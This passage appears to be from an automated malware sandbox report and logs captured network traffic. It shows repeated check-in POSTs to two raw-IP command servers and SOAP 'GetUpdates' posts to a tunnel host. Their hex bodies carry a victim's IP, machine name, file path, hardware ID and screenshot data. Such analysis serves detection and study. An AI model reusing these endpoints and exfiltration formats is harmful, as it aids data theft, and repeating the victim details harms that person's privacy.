                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95714Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95713Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95714Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95713Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
